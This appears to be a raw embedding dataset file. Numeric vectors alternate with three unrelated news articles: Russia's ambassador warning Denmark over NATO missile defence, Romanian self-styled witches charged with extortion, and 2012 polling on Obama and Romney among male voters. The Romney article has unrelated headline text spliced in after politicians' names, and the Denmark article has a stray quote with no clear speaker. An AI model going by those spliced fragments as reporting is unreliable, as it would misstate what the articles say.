-5.4707294028918174e-33, -0.0637410581111908, -0.06561010330915451, -0.07842749357223511, 0.08490616828203201, 0.02222815714776516, -0.01406894437968731, 0.02376818284392357, -0.04136504977941513, 0.033304695039987564, -0.11848799884319305, 0.007138020358979702, -0.02056177705526352, 0.05077029764652252, 0.05574315786361694, 0.019673293456435204, -0.05601644515991211, 0.056523628532886505, 0.016522541642189026, -0.010668737813830376, -0.06150371953845024, 0.061073221266269684, 0.08138997852802277, -0.07376609742641449, 0.08124260604381561, 0.0017287398222833872, -0.0018468534108251333, -0.03434014692902565, -0.054215867072343826, -0.028870968148112297, -0.03955996781587601, 0.012069625779986382, 0.03198305144906044, -0.013092165812849998, 0.024776574224233627, 0.023615838959813118, 0.07272626459598541, -0.06533738225698471, -0.02638375200331211, -0.07306317239999771, 0.025626368820667267, 0.008173235692083836, -0.11195056885480881, -0.063436359167099, -0.06509038805961609, -0.00022739126870874316, 0.013090464286506176, -0.025792459025979042, 0.02956307865679264, -0.0359446257352829, 0.02428271248936653, -0.07963933050632477, 0.025068851187825203, -0.015722252428531647, 0.08529656380414963, 0.0033429425675421953, -0.015206980518996716, -0.0494619756937027, 0.021020006388425827, -0.03136812523007393, 0.052050359547138214, -0.0266906525939703, 0.019303275272250175, 0.03648684546351433, -0.07269138097763062, 0.024255890399217606, -0.001447694026865065, 0.009465107694268227, 0.016086997464299202, 0.029840806499123573, -0.014902614988386631, -0.0021086842752993107, -0.059498533606529236, -0.06701274961233139, 0.010688737034797668, -0.014074627310037613, 0.021915510296821594, -0.07809809595346451, 0.0817570686340332, -0.060102567076683044, -0.006661710795015097, -0.04084428772330284, -0.102439284324646, 0.013234786689281464, -0.05031682550907135, 0.00036936637479811907, 0.1483011096715927, 0.011569740250706673, -0.0682632252573967, -0.050117138773202896, 0.02582266740500927, -0.0022558856289833784, -0.0738295242190361, -0.0802217498421669, -0.005751537159085274, 0.01063497457653284, -6.623898229918268e-8, 0.0934101790189743, 0.00880301371216774, -0.05083813518285751, 0.03308020159602165, -0.027060965076088905, 0.00644034706056118, -0.017501451075077057, -0.005374936852604151, -0.10286589711904526, 0.08673001080751419, 0.04710209369659424, -0.022724291309714317, 0.03024378977715969, -0.027583256363868713, 0.037408046424388885, 0.023820867761969566, 0.030782710760831833, 0.06791556626558304, -0.07805967330932617, -0.01786424219608307, 0.020492220297455788, 0.00851064920425415, 0.022155573591589928, 0.05753760412335396, -0.027377722784876823, 0.01693856529891491, -0.025475235655903816, 0.05488361418247223, 0.10637969523668289, -0.032139115035533905, -0.008813376538455486, 0.012869812548160553, -0.06326692551374435, 0.00523065822198987, 0.003428233787417412, 0.06291806697845459, -0.07985062152147293, 0.10501802712678909, 0.05795012786984444, 0.04691500961780548, -0.024143027141690254, 0.013995557092130184, 0.043128810822963715, 0.021230028942227364, -0.01980750262737274, -0.026771167293190956, 0.026553582400083542, 0.01344696432352066, 0.04788273945450783, 0.008029839023947716, 0.049026161432266235, 0.06639564782381058, -0.011950532905757427, 0.0596555732190609, 0.018294664099812508, -0.026488523930311203, 0.0006044344045221806, 0.04768218472599983, -0.06815072894096375, 0.01979421079158783, -0.02508876658976078, -0.030397353693842888, 0.025813542306423187, 0.016981488093733788 ]
Tensions between Denmark and Russia were ratcheted up a notch on Saturday. Russia’s ambassador to Denmark, Mikhail Vanin, wrote in an opinion piece published by Jyllands-Posten that Denmark has made itself a target of a potential nuclear attack by joining Nato’s missile defence system “I don’t think the Danes fully understand the consequences of what will happen if Denmark joins the American-controlled missile defence. If it happens, Danish war ships will become targets for Russian atomic missiles,” Vanin wrote. Denmark announced in August that it will will contribute at least one frigate to Nato’s defence system. At the time, Defence Minister Nicolai Wammen said that joining the missile defence system was not a move aimed at Russia. “That Denmark will join the missile defence system with radar capacity on one or more of our frigates is not an action that is targeted against Russia, but rather to protect us against rogues states, terrorist organisations and others that have the capacity to fire missiles at Europe and the US,” Wammen told Jyllands-Posten in August Vanin’s op-ed made it clear that Russia doesn’t share that interpretation. “Denmark will become a part of the threat against Russia. It will be less peaceful and the relationship with Russia will be harmed. It is of course your decision – I want to simply remind you that it will cost you both money and security,” Vanin wrote. “At the same time, Russia has missiles that are guaranteed to break through future global missile defence systems,” he continued. Danish Foreign Minister Martin Lidegaard called Vanin’s statements “unacceptable”. “Russia knows fully well that Nato’s missile defence is not aimed at them. We are in disagreement with Russia on a number of important things but it is important that the tone between us does not escalate,” Lidegaard told Jyllands-Posten. The US ambassador to Denmark, Rufus Gifford, also responded to Vanin's remarks. "We stand with our staunch Nato ally Denmark in condemning the unacceptable statements made by Russia's Ambassador to Denmark. We have made clear that Nato's ballistic missile defence is not directed at any country, but is meant to defend against missile threats," Gifford wrote on Facebook. On Twitter, he added that "such statements do not inspire confidence or contribute to peace and stability": US stands w/ DK in condemning statements made by Russia's Amb to DK. Such statements do not inspire confidence or contrib to peace/stability — Rufus Gifford (@rufusgifford) March 21, 2015 Denmark’s relationship with Russia has been strained by increased Russian airspace activity over and near Denmark. Vanin is not exactly a stranger to controversial statements. Following the December near-miss with the SAS, he suggested that Swedish authorities may have imagined the whole thing after smoking too much cannabis "The Swedish authorities also recently said there was a submarine in their waters. There wasn’t. Now they say again that they have seen something. I'm afraid the Swedes visit Pusher Street very often," Vanin told Berlingske, referring to the Christiania neighbourhood in Copenhagen known for its cannabis trade. “In terms of our territory, we are not worried. We keep our heads calm and the cockpit warm,” she said. Wammen has also said that Denmark would not hesitate to stand up to Russia telling the Financial Times that “the Russians know we will do what is necessary.”
[ -0.052584804594516754, 0.07830525934696198, -0.032895296812057495, -0.011162305250763893, 0.05678526312112808, 0.017038755118846893, 0.041091009974479675, 0.015084532089531422, 0.025779208168387413, -0.05422091484069824, -0.07110186666250229, 0.0399693064391613, 0.08011971414089203, 0.06084835156798363, -0.0012515499256551266, -0.007747887633740902, 0.014809131622314453, -0.052575066685676575, -0.03971034660935402, 0.06687933951616287, -0.08115202188491821, -0.029720742255449295, 0.09484200924634933, -0.0856960117816925, -0.016678089275956154, 0.016696114093065262, 0.11908552795648575, -0.027354374527931213, -0.14888902008533478, 0.04807319492101669, 0.01900480128824711, -0.11407683044672012, -0.12499655038118362, 0.05387100577354431, -0.008926229551434517, 0.021748127415776253, -0.002514915307983756, -0.07005366683006287, 0.07172095775604248, 0.05545411258935928, -0.009209554642438889, -0.01400795578956604, -0.01805282011628151, 0.009458140470087528, -0.0280240997672081, 0.08218342065811157, -0.04583451524376869, -0.05306069180369377, -0.09459351748228073, 0.01045397948473692, -0.02188386395573616, -0.023753803223371506, 0.02877979539334774, -0.057184211909770966, 0.06568574905395508, 0.00507922051474452, -0.04703722149133682, 0.07887087017297745, -0.036000583320856094, -0.06585435569286346, -0.03841383010149002, -0.09041178971529007, 0.05283541604876518, -0.03227389603853226, -0.012284677475690842, -0.051820822060108185, -0.01614745706319809, 0.0973874107003212, -0.05081138387322426, 0.04549362137913704, 0.016006262972950935, 0.059198860079050064, -0.030656538903713226, -0.020124755799770355, 0.08011047542095184, -0.03965336084365845, -0.0013371158856898546, 0.00017193544772453606, 0.06026027724146843, -0.07138717919588089, 0.0025276425294578075, -0.0321049727499485, -0.09324988722801208, -0.046085234731435776, 0.016776971518993378, 0.0017669567605480552, 0.11898750811815262, -0.026039354503154755, 0.030554383993148804, 0.069541335105896, 0.061868272721767426, -0.05239682272076607, 0.042701784521341324, 0.06659913063049316, 0.012906540185213089, 0.010498784482479095, 0.04276413097977638, 0.005006777122616768, -0.07973074167966843, -0.0027294724714010954, 0.026135403662919998, 0.07611716538667679, 0.03011263720691204, -0.014334186911582947, -0.09341730922460556, -0.02757357619702816, -0.054539065808057785, -0.045362088829278946, 0.0055362205021083355, -0.0374181792140007, -0.01320021040737629, -0.0967014878988266, -0.013134711422026157, -0.1057017520070076, -0.03276900202035904, 0.017531899735331535, -0.037929024547338486, -0.04144159331917763, 0.02849847450852394, -0.059814177453517914, 0.051629673689603806, -0.030310794711112976, 0.048627663403749466, 0.14376366138458252, 0.0584089495241642, 0.11473115533590317, -0.1115351989865303, 2.1580999969082227e-33, -0.040947120636701584, 0.013250741176307201, -0.04799174889922142, 0.022810807451605797, -0.07446552067995071, -0.059531912207603455, -0.02932456135749817, -0.002751821419224143, -0.053707826882600784, 0.00225628144107759, -0.07941240072250366, -0.03811729699373245, -0.04009968414902687, 0.047146473079919815, 0.03367257118225098, 0.007174718659371138, 0.07642293721437454, 0.05801292881369591, -0.026579154655337334, 0.08569172769784927, 0.11218532174825668, -0.011064687743782997, 0.03311433643102646, 0.03348391503095627, 0.02362978458404541, -0.005760463420301676, -0.02202456258237362, 0.04235614091157913, -0.02605976164340973, -0.00525578623637557, -0.06585625559091568, 0.042481325566768646, -0.052543170750141144, -0.014698364771902561, -0.013057013042271137, -0.006035822443664074, -0.09361845254898071, 0.00031658419175073504, -0.0235345009714365, -0.01645861193537712, 0.07044651359319687, -0.03952668234705925, -0.02305733412504196, 0.036246493458747864, 0.11474836617708206, -0.09942404180765152, -0.04179791361093521, -0.01701723225414753, -0.026521261781454086, -0.06652576476335526, 0.000315043464070186, -0.006859920918941498, 0.0810471698641777, 0.05267903953790665, 0.034008827060461044, -0.0768124908208847, -0.02526879496872425, 0.03018265962600708, 0.05362445488572121, -0.0592074878513813, -0.05700914189219475, -0.10696031153202057, 0.01604587957262993, 0.03668176755309105, 0.06298159807920456, 0.06424029171466827, 0.009305321611464024, 0.03972647711634636, -0.06720899045467377, 0.06433072686195374, 0.04072083905339241, -0.017991745844483376, 0.07347837835550308, 0.055309001356363297, -0.004536505788564682, 0.02886894717812538, 0.016351869329810143, 0.002350687747821212, 0.08029573410749435, 0.02193775400519371, -0.07854519039392471, 0.020139340311288834, 0.045673903077840805, 0.020921798422932625, -0.050788648426532745, -0.030331267043948174, -0.017197920009493828, -0.06826122105121613, -0.0067853908985853195, 0.0731004998087883, -0.025696981698274612, -0.035403527319431305, -0.0491139180958271, 0.05178830027580261, 0.0026015567127615213, -3.896974627275062e-33, -0.009815866127610207, 0.0666271299123764, -0.11597715318202972, -0.009545053355395794, -0.0466751903295517, 0.04663592576980591, 0.011013822630047798, 0.040564075112342834, -0.05960620194673538, -0.005903576500713825, 0.010203712619841099, -0.10104180872440338, -0.031042952090501785, 0.08108571171760559, -0.003743154462426901, 0.017640890553593636, 0.1193377897143364, 0.10272061824798584, 0.0044348579831421375, -0.07564405351877213, 0.05135291442275047, -0.062352027744054794, -0.0007617055671289563, 0.030257750302553177, 0.040723491460084915, 0.020913777872920036, 0.09724419564008713, -0.018789872527122498, -0.08571822941303253, -0.05118118226528168, -0.009694617241621017, 0.003515578806400299, 0.02775954082608223, 0.08730202913284302, 0.03284713253378868, 0.056012023240327835, 0.0457480363547802, -0.0032455846667289734, -0.031346894800662994, 0.004602415952831507, 0.029167696833610535, -0.07254885137081146, -0.03862849250435829, 0.08275530487298965, -0.044242504984140396, -0.05101567134261131, 0.06683921813964844, 0.10552644729614258, 0.0000687463179929182, -0.024234799668192863, -0.04056473821401596, 0.03951696306467056, 0.009777332656085491, -0.09246315062046051, 0.010631393641233444, 0.021251888945698738, 0.024890271946787834, -0.020427541807293892, 0.10444489121437073, -0.018550563603639603, 0.009623019956052303, 0.00027408095775172114, 0.06452324241399765, 0.007656199857592583, -0.059088632464408875, 0.009755660779774189, -0.05237327143549919, 0.04223770648241043, 0.08226162940263748, 0.026585692539811134, 0.05036287382245064, 0.002505392301827669, 0.045567434281110764, 0.014935814775526524, 0.04851355776190758, -0.04365326836705208, 0.010357963852584362, 0.02373109944164753, -0.031022684648633003, 0.013956527225673199, -0.05280456691980362, -0.0901646688580513, -0.07311349362134933, -0.02552243322134018, 0.009461071342229843, 0.03906337916851044, 0.019625172019004822, -0.049321532249450684, -0.0335397906601429, -0.06786243617534637, -0.05434538424015045, -0.01793256774544716, -0.009404698386788368, 0.025365544483065605, -0.05348614230751991, -4.9940364732492526e-8, 0.05213306099176407, -0.03216135501861572, -0.0049612317234277725, -0.0065375929698348045, -0.03262085095047951, 0.010192019864916801, -0.012970774434506893, -0.02213939279317856, -0.08528418838977814, -0.015710102394223213, 0.023460807278752327, 0.01595367304980755, -0.04055522382259369, -0.017515093088150024, 0.009933874011039734, 0.026964375749230385, 0.006597036961466074, -0.02222629263997078, -0.06796664744615555, -0.02951662242412567, -0.001701928093098104, 0.01642942614853382, -0.0812319666147232, 0.007260218728333712, -0.004247289150953293, 0.04320739209651947, 0.012048904784023762, 0.03126479312777519, 0.008629649877548218, -0.05884688347578049, 0.03446667268872261, -0.05512944608926773, -0.0307157039642334, 0.04227856919169426, 0.004790252074599266, 0.05745123326778412, 0.010204414837062359, 0.0006586037343367934, -0.0004006456001661718, 0.023798799142241478, -0.07885779440402985, 0.049758508801460266, 0.005610066466033459, 0.06039297208189964, -0.03772537410259247, -0.012959943152964115, -0.05098150670528412, -0.07336466014385223, 0.003925350494682789, 0.008457073010504246, -0.013005477376282215, 0.035156767815351486, -0.0071088154800236225, 0.02882387489080429, -0.04032854735851288, 0.1196461021900177, 0.025265462696552277, -0.03353484719991684, 0.08700904250144958, 0.0720800906419754, -0.02191094681620598, -0.060122255235910416, -0.011603276245296001, 0.02554982155561447 ]
This article is over 7 years old TV presenter handed over £378,000 in exchange for spells said to involve animal sacrifice Two self-professed witches have been detained in Romania on blackmail and extortion charges in a high-profile case involving a TV star and reportedly other public figures. A police spokesman, Christian Ciocan, said the two women – who go by the single names of Melissa and Vanessa – approached public figures promising to help them overcome work or love difficulties, and break curses. He said the women initially charged very little, but then, as their victims became hooked on their services, increased their prices. Ciocan cited one case where the victim – who later publicly identified herself as actor, singer and TV presenter Oana Zavoranu – handed over €450,000 (£378,000) in cash and property in exchange for spells. He said the witches practised black magic, and sacrificed animals in graveyards and near rivers, claiming this would protect Zavoranu from her mother and in-laws who had put a curse on her. The witches, however, claim Zavoranu is being vengeful because she asked them to cast a spell that would kill her mother, but the mother is still alive. The ex-wife of businessman Cristi Borcea, one of two owners of Romanian football team Dinamo Bucharest, was also cited as a victim, but she has neither confirmed or denied the case. Ciocan said if the victims tried to cease payment, the two women would threaten to put a spell on them, or disclose details of their personal lives. A court ruled on WednesdayMelissa and Vanessa would be released later the same day, awaiting trial. Many people believe in witchcraft in Romania. President Traian Basescu and his aides have been known to wear purple on certain days, supposedly to ward off evil. Romania has recently been trying to introduce legislation to limit witchcraft. This month, Nicolae Paun, who represents the Roma in parliament, said legislation must be enacted to stop what he called "backward practices". Most self-professed witches in Romania are Roma.
[ -0.0003954989369958639, 0.007664505857974291, -0.08139637112617493, 0.03980080783367157, -0.037526797503232956, 0.020933836698532104, 0.10276232659816742, 0.01925133727490902, 0.0004816286382265389, -0.013854178600013256, 0.012741344049572945, -0.05026845261454582, -0.00876015704125166, 0.014948968775570393, -0.062494903802871704, 0.020919272676110268, -0.01922011189162731, -0.01617099530994892, -0.08646095544099808, 0.12717287242412567, -0.02137310989201069, -0.060815636068582535, 0.04636070877313614, -0.010376331396400928, 0.011591761372983456, -0.03521397337317467, -0.03384480997920036, -0.05039786174893379, -0.03967008739709854, 0.008597004227340221, 0.0188206285238266, 0.017833920195698738, -0.09441694617271423, -0.03707028925418854, -0.01706625148653984, 0.0062416717410087585, 0.009892366826534271, 0.0614670030772686, -0.08730927109718323, -0.04563319310545921, 0.051591094583272934, -0.05058404803276062, -0.12053991109132767, 0.005358634516596794, -0.04270104691386223, -0.055158279836177826, 0.10936599224805832, 0.05335068702697754, -0.06655868887901306, -0.07256972789764404, -0.03206716477870941, 0.013069670647382736, -0.012139436788856983, 0.06397119164466858, -0.06928595155477524, -0.10882983356714249, 0.023569704964756966, 0.009929216466844082, 0.008984431624412537, 0.029079530388116837, 0.025837687775492668, 0.03462807461619377, 0.019877156242728233, 0.038334161043167114, 0.03325663506984711, -0.0017736820736899972, 0.05231105163693428, 0.041061218827962875, -0.013677876442670822, -0.030916528776288033, 0.046374741941690445, -0.02826358750462532, 0.0072842007502913475, -0.030861319974064827, 0.001734216115437448, 0.05705754831433296, 0.06941141188144684, -0.07247985899448395, 0.040324144065380096, -0.016595905646681786, 0.06082852929830551, -0.08540284633636475, 0.023319251835346222, 0.02436918206512928, 0.07366181164979935, -0.010635348036885262, 0.0031528885010629892, -0.013024313375353813, 0.10400853306055069, 0.02983791194856167, -0.0010487561812624335, 0.03446543216705322, 0.033447638154029846, -0.00011998652917100117, 0.05982203036546707, -0.03167764097452164, -0.013412642292678356, -0.013501002453267574, -0.09020374715328217, 0.1347579061985016, -0.04986224323511124, 0.012266889214515686, 0.02929985523223877, -0.01875520497560501, 0.013757574371993542, 0.0010734472889453173, 0.03576993942260742, -0.03537275642156601, -0.02963930554687977, 0.0643690824508667, -0.02653055638074875, -0.003625589655712247, -0.02983986958861351, -0.049499426037073135, 0.06653942167758942, 0.11068344116210938, 0.003405895782634616, 0.03071519359946251, -0.0013803552137687802, -0.09507717937231064, 0.0479901060461998, 0.02968793921172619, -0.04415036737918854, 0.04333535209298134, 0.00892315711826086, -0.04163384065032005, -0.06458884477615356, 5.340363773307764e-33, 0.026850154623389244, -0.029376983642578125, -0.012947333045303822, -0.01761181838810444, 0.01556431595236063, 0.14102348685264587, -0.07804962992668152, 0.12123145908117294, 0.014074540697038174, -0.013211599551141262, 0.01642022840678692, -0.10148753225803375, 0.0573524609208107, -0.09786632657051086, -0.09611178934574127, 0.03969369828701019, 0.026524696499109268, -0.02342154085636139, 0.03440174087882042, 0.004491385538130999, 0.10885725915431976, 0.04386308789253235, -0.0015254662139341235, 0.012485298328101635, -0.10631968826055527, -0.07104168087244034, -0.02202104963362217, -0.011159864254295826, 0.0818866714835167, -0.012667900882661343, -0.010628246702253819, -0.03197021409869194, 0.08616561442613602, -0.05844036862254143, 0.03816893324255943, -0.01418890617787838, 0.010894687846302986, -0.09346695989370346, 0.03650854155421257, -0.00027922377921640873, -0.054088033735752106, 0.006373034790158272, 0.08990558981895447, -0.027039581909775734, -0.07323068380355835, 0.017063645645976067, -0.05535677447915077, -0.048166513442993164, -0.061408378183841705, 0.042050864547491074, 0.004118562676012516, 0.04524029791355133, -0.059511441737413406, -0.004491523373872042, -0.07941662520170212, 0.013576585799455643, -0.05079437047243118, -0.04181019216775894, 0.06052820384502411, -0.04444870352745056, 0.03149236738681793, -0.041289590299129486, 0.015346757136285305, -0.009206149727106094, -0.023219937458634377, -0.06301666796207428, 0.021407488733530045, 0.056402791291475296, 0.0010711115319281816, -0.022711131721735, -0.058632221072912216, 0.038115233182907104, 0.004518087487667799, -0.06822653114795685, -0.05061880871653557, 0.010537429712712765, 0.07266385853290558, 0.009382786229252815, -0.06067270785570145, 0.0893561989068985, 0.04947863891720772, 0.015657341107726097, 0.04329666867852211, 0.02489684522151947, -0.0068716430105268955, 0.005746208131313324, -0.0407290980219841, -0.08538158237934113, 0.03864124417304993, -0.000678437587339431, 0.0951826348900795, 0.015849094837903976, -0.0007498639752157032, -0.1407666951417923, 0.006228920072317123, -4.83440235203905e-33, -0.05629841610789299, -0.025611916556954384, -0.0025676123332232237, -0.010213315486907959, 0.09072355180978775, -0.09074907004833221, -0.0805852934718132, 0.021414922550320625, 0.03958753123879433, -0.027331938967108727, -0.07614738494157791, -0.053487397730350494, 0.04168962687253952, 0.05127221345901489, 0.002524192677810788, -0.04332095757126808, 0.01671634241938591, 0.003788525704294443, 0.0665622130036354, -0.06577465683221817, -0.0066649834625422955, 0.09383588284254074, -0.08940146863460541, 0.023348994553089142, -0.03093191795051098, 0.025659974664449692, 0.09991937130689621, 0.021724658086895943, 0.011207982897758484, 0.0034092224668711424, 0.02456461265683174, 0.013324649073183537, -0.022140946239233017, 0.00986288022249937, -0.047239046543836594, 0.07729161530733109, 0.032845061272382736, -0.034855104982852936, -0.07924176007509232, -0.060937270522117615, 0.0645579993724823, 0.011944236233830452, -0.050663065165281296, 0.0003571116249077022, -0.061329882591962814, -0.039476990699768066, 0.03437386080622673, 0.042559511959552765, 0.1520259827375412, -0.031215708702802658, 0.07596687972545624, 0.026003235951066017, -0.09423653036355972, 0.012199096381664276, 0.053566817194223404, -0.04466333985328674, 0.02540605142712593, -0.0937488004565239, 0.05097923427820206, -0.04028308764100075, 0.01278377790004015, -0.014442285522818565, -0.039500124752521515, -0.005781886167824268, -0.030828896909952164, 0.013318251818418503, 0.02008751966059208, -0.019430244341492653, 0.004456710536032915, -0.05163348466157913, 0.02047465741634369, 0.01526481844484806, -0.02197120152413845, -0.024644402787089348, 0.004933593329042196, 0.13236655294895172, 0.06924515217542648, 0.02448633499443531, 0.052921149879693985, -0.016693858429789543, 0.06750161200761795, -0.13340972363948822, 0.0894102156162262, 0.03216468542814255, 0.02300368621945381, -0.02016620710492134, 0.039711855351924896, 0.02271345630288124, 0.030596276745200157, 0.03481312841176987, 0.017086032778024673, -0.004844886250793934, 0.10871588438749313, 0.01687193661928177, 0.0434543676674366, -5.5916657970556116e-8, -0.013105625286698341, -0.04609362408518791, 0.009970230981707573, 0.040126726031303406, 0.023532120510935783, 0.00548846460878849, 0.0482231006026268, -0.04104321449995041, -0.05621364340186119, 0.07079953700304031, -0.01934247650206089, 0.04036783427000046, 0.04527123272418976, -0.064981609582901, 0.03268881142139435, 0.03200267255306244, 0.052290767431259155, -0.045705731958150864, -0.032753050327301025, 0.05710763484239578, -0.0521249882876873, 0.06693495064973831, -0.03901249170303345, -0.035675980150699615, 0.017986103892326355, -0.05247737094759941, -0.06736552715301514, 0.009570907801389694, 0.0027055770624428988, 0.0067696040496230125, 0.006775808986276388, -0.02873837761580944, 0.028711488470435143, -0.03566236421465874, -0.0034700529649853706, -0.05492974817752838, -0.09518369287252426, -0.004725364036858082, -0.059059202671051025, -0.011116244830191135, 0.021730609238147736, -0.019318712875247, 0.11694515496492386, 0.02183871529996395, 0.01644851639866829, -0.055136051028966904, -0.07400915771722794, -0.04497089236974716, 0.029689176008105278, -0.005801578052341938, 0.00914166308939457, 0.05297663062810898, 0.08620759844779968, 0.05768894404172897, 0.021799039095640182, -0.11913657188415527, -0.017967863008379936, 0.061056315898895264, -0.053237296640872955, 0.04034380242228508, 0.018864605575799942, -0.09654633700847626, -0.006117031443864107, -0.02928057871758938 ]
Mitt Romney’s advantage among male voters has all but disappeared since the Democratic National Convention. The pattern will likely spell doom for Romney unless it represents an entirely transient “bump” for President Obama — which it might. ADVERTISEMENT Several polls released in recent days show Obama displaying new strength among male voters. Romney needs to win the male electorate by a wide margin to overcome the chronic disadvantage the GOP faces with respect to women. A CNN poll released Monday showed Obama moving into a small lead among men, besting Romney 48 percent to 47. The finding was especially notable because CNN, in a poll conducted about a week prior, had shown Romney holding a 12-point lead among men (55 percent to 43). On Tuesday, an ABC News/Washington Post poll found Obama enjoying a 3-point edge among men. In a memo accompanying the poll’s release, its authors, Langer Research Associates, noted that “Obama’s support has reached a new high among men” — higher than at any point during this election cycle. In addition, a new poll from the Democratic-leaning Public Policy Polling organization found that Obama has a 1-point lead among men, taking 47 percent to Romney’s 46. Democrats are delighted with those numbers. “If that holds, there’s no way Romney can win,” said Bob Shrum, the longtime Democratic strategist who ran Sen. John Kerry John Forbes KerryOvernight Defense: White House eyes budget maneuver to boost defense spending | Trump heads to Hanoi for second summit with Kim | Former national security officials rebuke Trump on emergency declaration 58 ex-national security officials rebuke Trump over emergency declaration Ex-national security officials to issue statement slamming Trump's emergency declaration: WaPo MORE’s (D-Mass.) 2004 bid for the White House. The Romney campaign has been pushing back hard against the polls in recent days. On Monday, it circulated a memo from its in-house pollster, Neil Newhouse, asserting that no one should “get too worked up about the latest polling” and characterizing the boost Obama is enjoying as a “sugar-high.” On Tuesday, a Romney campaign aide told The Hill that the shift in male voting intentions was part of the same pattern. “He got a temporary boost that shouldn’t last long,” the aide argued. Still, even Republicans who think that those predictions will ultimately prove true admit their worries about the current state of play. “It’s definitely a concern,” said Dan Judy, a vice president at North Star Opinion Research, a GOP firm. “Men, and especially white men, are a core constituency for Republicans, especially in swing states. Romney’s got to run up big, big margins with them.” One case in point is the 2004 presidential election. Kerry beat President George W. Bush by 3 percentage points among female voters (51 percent to 48), according to exit polls. But Bush prevailed by winning male voters by a whopping 11-point margin (55-44). In 2008, Obama won the female vote by 13 percentage points (56-43) over his Republican opponent, Sen. John McCain John Sidney McCainGOP lobbyists worry Trump lags in K Street fundraising Mark Kelly kicks off Senate bid: ‘A mission to lift up hardworking Arizonans’ Gabbard hits back at Meghan McCain after fight over Assad MORE (Ariz.). By comparison, he edged McCain by just a single point among men overall (49-48), and lost white men by 16 percentage points. Reasons for the recent shift are not entirely clear. Some commentators point to the tone of the Democratic National Convention as, in parts, having particular appeal to men. Democratic strategist James Carville told CNN that Obama’s own speech was “muscular,” perhaps alluding to its sharp attacks on Romney on matters of foreign policy. Former President Clinton, Vice President Biden and Kerry sought to paint Obama as strong and decisive — and, at times, attacked Romney and the Republicans as effete. Obama, Biden testified, “has courage in his soul, compassion in his heart and steel in his spine.” “Ask Osama bin Laden if he is better off now than he was four years ago,” Kerry said during his speech, in which he also said, “It isn’t fair to say that Mitt Romney doesn’t have a position on Afghanistan. He has every position.” Judy said he was not surprised to see the Democrats trying to seize the national-security mantle “because there are not a whole lot of areas where Barack Obama Barack Hussein ObamaWith low birth rate, America needs future migrants 4 ways Hillary looms over the 2020 race Obama goes viral after sporting black bomber jacket with '44' on sleeve at basketball game MORE can point to his record. Every time Democrats talk about [the bin Laden operation] is time they don’t have to spend talking about the economy, or ObamaCare, or a lot of other things that are not so popular.” Judy argued that, once memories of the conventions begin to fade, the electorate will focus again on the economy. This, he asserted, would be to Romney’s benefit. For the moment, however, Democrats are very happy with where things stand. And one of the more recent attempts for Romney to boost his machismo — the appearance by Clint Eastwood at the Republican convention — only broadened their smiles. “I thought that was awful,” Shrum said. “It was embarrassing for Eastwood; it ate into Romney’s time. I mean, that just wasn’t serious.”
[ -0.031934723258018494, -0.09294553846120834, 0.010555479675531387, -0.03845832496881485, 0.01225952710956335, 0.09697935730218887, 0.06303726136684418, 0.005959463305771351, -0.013128583319485188, -0.007148980163037777, -0.04316260665655136, 0.07730962336063385, 0.055214595049619675, -0.04627486690878868, 0.04857604578137398, 0.03202143311500549, 0.06497302651405334, 0.005218768958002329, -0.028806833550333977, 0.07505243271589279, -0.0548250786960125, -0.006834805943071842, 0.09087345749139786, -0.09075523912906647, 0.07696032524108887, -0.049063220620155334, 0.0025191055610775948, -0.03088957816362381, -0.03710898384451866, 0.03350337967276573, 0.047540333122015, -0.01810172200202942, 0.02352987974882126, -0.0025719404220581055, -0.04816120117902756, -0.054523129016160965, -0.059562161564826965, 0.009485654532909393, 0.07315181940793991, 0.06907962262630463, -0.0010176908690482378, -0.07679662108421326, 0.03205248340964317, 0.004296448081731796, 0.01935296133160591, 0.04285365715622902, 0.026028377935290337, 0.005524073261767626, 0.013303238898515701, 0.005678181070834398, -0.045548029243946075, 0.03814149275422096, 0.06159809231758118, 0.04025759920477867, 0.01807502470910549, -0.006681694183498621, -0.07547498494386673, -0.017624178901314735, -0.06294291466474533, 0.058691613376140594, 0.015262638218700886, 0.061114534735679626, -0.0012650059070438147, -0.0022386680357158184, -0.023674946278333664, 0.0030651779379695654, -0.04616444185376167, 0.006764492020010948, 0.0009391044150106609, 0.059662092477083206, 0.14256878197193146, 0.06201564520597458, -0.08009187877178192, 0.0012739531230181456, 0.03249848261475563, -0.05043068900704384, -0.01581951603293419, 0.03187723830342293, 0.026904508471488953, -0.0201322790235281, 0.0009303264669142663, 0.004463892430067062, -0.006131644826382399, 0.11789242923259735, -0.001556388451717794, -0.03871958330273628, -0.025835558772087097, 0.018813487142324448, -0.05049905553460121, 0.11973637342453003, -0.12067340314388275, -0.004268574062734842, -0.08455964177846909, -0.02361513487994671, 0.04422812536358833, 0.015516403131186962, -0.0584663487970829, -0.013180918991565704, -0.11421894282102585, 0.05406438559293747, -0.01193804107606411, 0.08386921882629395, -0.05477388575673103, -0.037787750363349915, -0.022202689200639725, -0.00175095081795007, 0.011844049207866192, 0.08970192074775696, 0.0010342765599489212, 0.028135506436228752, 0.020723652094602585, -0.000489517638925463, -0.021440671756863594, 0.0285965446382761, 0.015009719878435135, -0.14062117040157318, 0.025143805891275406, 0.019047636538743973, 0.0025136168114840984, 0.10307872295379639, 0.021890001371502876, -0.014178884215652943, 0.03222745284438133, -0.02175607718527317, 0.013220971450209618, -0.025080634281039238, -0.0885954424738884, 2.0215543894457135e-33, 0.017894946038722992, 0.0025248625315725803, 0.041093479841947556, 0.047757428139448166, -0.05616486072540283, 0.09119979292154312, 0.005126151256263256, -0.09901247173547745, -0.09312567114830017, -0.05402632802724838, -0.060004737228155136, 0.0319397896528244, -0.058021266013383865, 0.06310627609491348, 0.01177392341196537, 0.004005610477179289, 0.01674484834074974, 0.037647876888513565, -0.08258601278066635, -0.08540600538253784, -0.018977876752614975, 0.031105762347579002, -0.02385139837861061, -0.07933200895786285, -0.006257903296500444, -0.027118323370814323, -0.00647930009290576, 0.016430003568530083, -0.09147636592388153, 0.006125272251665592, -0.06483327597379684, -0.026430372148752213, -0.055404648184776306, 0.027517762035131454, -0.06869442760944366, -0.003843423444777727, -0.06667282432317734, 0.025369703769683838, -0.008116153068840504, 0.07914526015520096, -0.01333092711865902, 0.04903855547308922, 0.01762249320745468, 0.026412097737193108, -0.03601083904504776, 0.04529544338583946, 0.018730465322732925, 0.031829096376895905, -0.06933487951755524, 0.021166816353797913, 0.03446449711918831, 0.0631672739982605, 0.07838811725378036, -0.033380597829818726, -0.04129519686102867, 0.01123904064297676, 0.021493619307875633, -0.023638585582375526, -0.060210857540369034, 0.0047793034464120865, 0.017377182841300964, 0.0011949719628319144, -0.04762982204556465, 0.027417205274105072, -0.09150288999080658, -0.0062019480392336845, -0.05128681659698486, 